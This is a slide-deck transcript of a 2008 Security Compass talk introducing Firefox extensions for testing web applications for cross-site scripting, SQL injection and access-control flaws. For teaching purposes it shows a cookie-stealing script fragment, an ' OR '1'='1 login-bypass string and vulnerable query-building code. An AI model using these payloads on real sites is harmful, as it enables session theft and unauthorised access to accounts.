© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.

Slides:



Advertisements
Similar presentations
© 2002 D & D Enterprises 1 Linking Images For Navigation & Clickable Image Maps.
Advertisements

Advanced Piloting Cruise Plot.
1 Copyright © 2002 Pearson Education, Inc.. 2 Chapter 2 Getting Started.
Chapter 1 The Study of Body Function Image PowerPoint
1 Copyright © 2010, Elsevier Inc. All rights Reserved Fig 2.1 Chapter 2.
Nick Feamster CS 6262 Spring 2009
SecuBat: An Automated Web Vulnerability Detection Framework
Business Transaction Management Software for Application Coordination 1 Business Processes and Coordination.
Webgoat.
Tutorial 9 – Creating On-Screen Forms Using Advanced Table Techniques
Jeopardy Q 1 Q 6 Q 11 Q 16 Q 21 Q 2 Q 7 Q 12 Q 17 Q 22 Q 3 Q 8 Q 13
Jeopardy Q 1 Q 6 Q 11 Q 16 Q 21 Q 2 Q 7 Q 12 Q 17 Q 22 Q 3 Q 8 Q 13
Title Subtitle.
Child Health Reporting System (CHRS) How to Submit VHSS Data
My Alphabet Book abcdefghijklm nopqrstuvwxyz.
Addition Facts
1 NatQuery 3/05 An End-User Perspective On Using NatQuery To Extract Data From ADABAS Presented by Treehouse Software, Inc.
Cross-site Request Forgery (CSRF) Attacks
ABC Technology Project
“The Honeywell Web-based Corrective Action Solution”
1 What is JavaScript? JavaScript was designed to add interactivity to HTML pages JavaScript is a scripting language A scripting language is a lightweight.
Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
HORIZONT TWS/WebAdmin TWS/WebAdmin for Distributed
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
©2007 First Wave Consulting, LLC A better way to do business. Period This is definitely NOT your father’s standard operating procedure.
© 2012 National Heart Foundation of Australia. Slide 2.
Lets play bingo!!. Calculate: MEAN Calculate: MEDIAN
Understanding Generalist Practice, 5e, Kirst-Ashman/Hull
Chapter 5 Test Review Sections 5-1 through 5-4.
GG Consulting, LLC I-SUITE. Source: TEA SHARS Frequently asked questions 2.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Addition 1’s to 20.
25 seconds left…...
Graphing AWR Data in Excel
Services Course Windows Live SkyDrive Participant Guide.
Week 1.
We will resume in: 25 Minutes.
Chapter 12 Working with Forms Principles of Web Design, 4 th Edition.
PSSA Preparation.
Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.
A lesson approach © 2011 The McGraw-Hill Companies, Inc. All rights reserved. a lesson approach Microsoft® PowerPoint 2010 © 2011 The McGraw-Hill Companies,
Use the buttons on the top to navigate through the presentation 1 PrevNext Menu.
CMPT 100 : INTRODUCTION TO COMPUTING TUTORIAL #5 : JAVASCRIPT 2 GUESSING GAME By Wendy Sharpe 1.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
CGI Security COEN 351. CGI Security Security holes are exploited by user input. We need to check user input against Buffer overflows etc. that cause a.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Introduction To Web Application Security in PHP. Security is Big And Often Difficult PHP doesn’t make it any easier.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
Web Applications Testing By Jamie Rougvie Supported by.
Building Secure Web Applications With ASP.Net MVC.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflow Analysis of Buffer Overflow Attacks.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.
SQL Injection Josh Mann. What is SQL Injection  SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries.
Javascript worms By Benjamin Mossé SecPro
SQL Injection.
Building Secure ColdFusion Applications
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
World Wide Web policy.
Example – SQL Injection
Riding Someone Else’s Wave with CSRF
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Exploring DOM-Based Cross Site Attacks
Presentation transcript:

© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me

© 2008 Security Compass inc. Tom Aratyn –Software Developer at Security Compass –Developed the Exploit Me tools Who are we? 2

© 2008 Security Compass inc. Jamie –Security Consultant for Security Compass –Background in security research, penetration testing, and software development Who are we? 3

© 2008 Security Compass inc. Cross-site scripting, really a danger? State of web application security XSS-Me SQL Inject-Me Access Me Agenda 4

© 2008 Security Compass inc. We know XSS can be dangerous, but can we use it to rob a bank? –AJAX + CSRF + XSS = Major problem XSS – Really a Danger? 5

© 2008 Security Compass inc. Reflected –Spit back as soon as it goes in –XSS-Me helps here Stored –Saving it for someone else –XSS-Me future version Two Exciting Flavours 6

© 2008 Security Compass inc. Un-validated user input executed by the users computer JavaScript is typically used –PDF files are XSS-able Someone took my cookie What is this XSS Stuff 7 location.href=“ escape(document.cookie); location.href=“ escape(document.cookie);

© 2008 Security Compass inc. AJAX is adding a new element into these attacks –AJAX was used in the IBDBank attack Attacker can play with data as if the victim is doing it –Send –Receive –Parse Someone Changed my App 8

© 2008 Security Compass inc. State of Web App Insecurity 9 Web app exploits outnumber buffer overflows in CVE Large portion of web apps suffer from XSS or SQL Injection

© 2008 Security Compass inc. Various tools exist –OWASP tools, commercial, Open Source Work very well –For what they were built to do Testing Tools 10

© 2008 Security Compass inc. Most tools not for developers or QA Developers and QA must be checking for security vulnerabilities Need lightweight tools The Missing Piece 11

© 2008 Security Compass inc. Firefox extension to test for cross-site scripting XSS-Me 0.4 to the Rescue 12

© 2008 Security Compass inc. Pick forms & fields to test Firefox 3 Import/export/add/remove XSS strings Test & Surf Heuristics to limit tests XSS-Me Features 13

© 2008 Security Compass inc. Checking all attacks against all fields is slow. –No, trust me, it’s slow Heuristic tests limit the fields we have to check by determining if we can inject them –Passes set of characters and checks if they’re returned (;\/<>=‘”) Heuristics? 14

© 2008 Security Compass inc. Attempts to set document.vulnerable=true into the DOM If property set, attack worked Also checks for plain text string, a potential vulnerability –OnMouseOver injection Behind the Magic 15

© 2008 Security Compass inc. Everyone says use Struts to protect yourself –Sure, just don’t follow the supplied examples Thank $deity for Struts 16

© 2008 Security Compass inc. Being Bobby 17 sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'" User Input: username = jimmy password = blah’ OR ‘1’=‘1 SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’ Since “WHERE 1=1” is true for all records the entire table is returned! Courtesy XKCD.com

© 2008 Security Compass inc. Defence is well known and faster than what you’re doing now –Prepared Statements –Stored Procedure Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right? No Excuse 18

© 2008 Security Compass inc. Firefox extension to check for SQL injection SQL Inject-Me

© 2008 Security Compass inc. Pick what you test Configure attack and success strings Large default string set Firefox 3 Test & Surf SQL Inject-Me Features 20

© 2008 Security Compass inc. Web/application servers maybe vulnerable to HTTP Verb Tampering attacks Bypasses common authorization configurations What’s your method 21

© 2008 Security Compass inc. Access Me Firefox extension to check for authentication issues

© 2008 Security Compass inc. Checks for unauthenticated access vulnerabilities Checks for HTTP verb vulnerabilities Regular expression based parameter detection Automatic test as you surf Access Me Features 23

© 2008 Security Compass inc. Detecting Access Vulnerabilities 24 Failed if response status is 200 and response too similar Warning if response status is 200 or response too similar

© 2008 Security Compass inc. Available off of our website – Extra XSS-Me attack strings also available from site Open sourced under GPL v3 Where can you get ‘em 25

© 2008 Security Compass inc. May include –Spidering Stored attacks The Future... 26

© 2008 Security Compass inc. Lets have ‘em 27

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.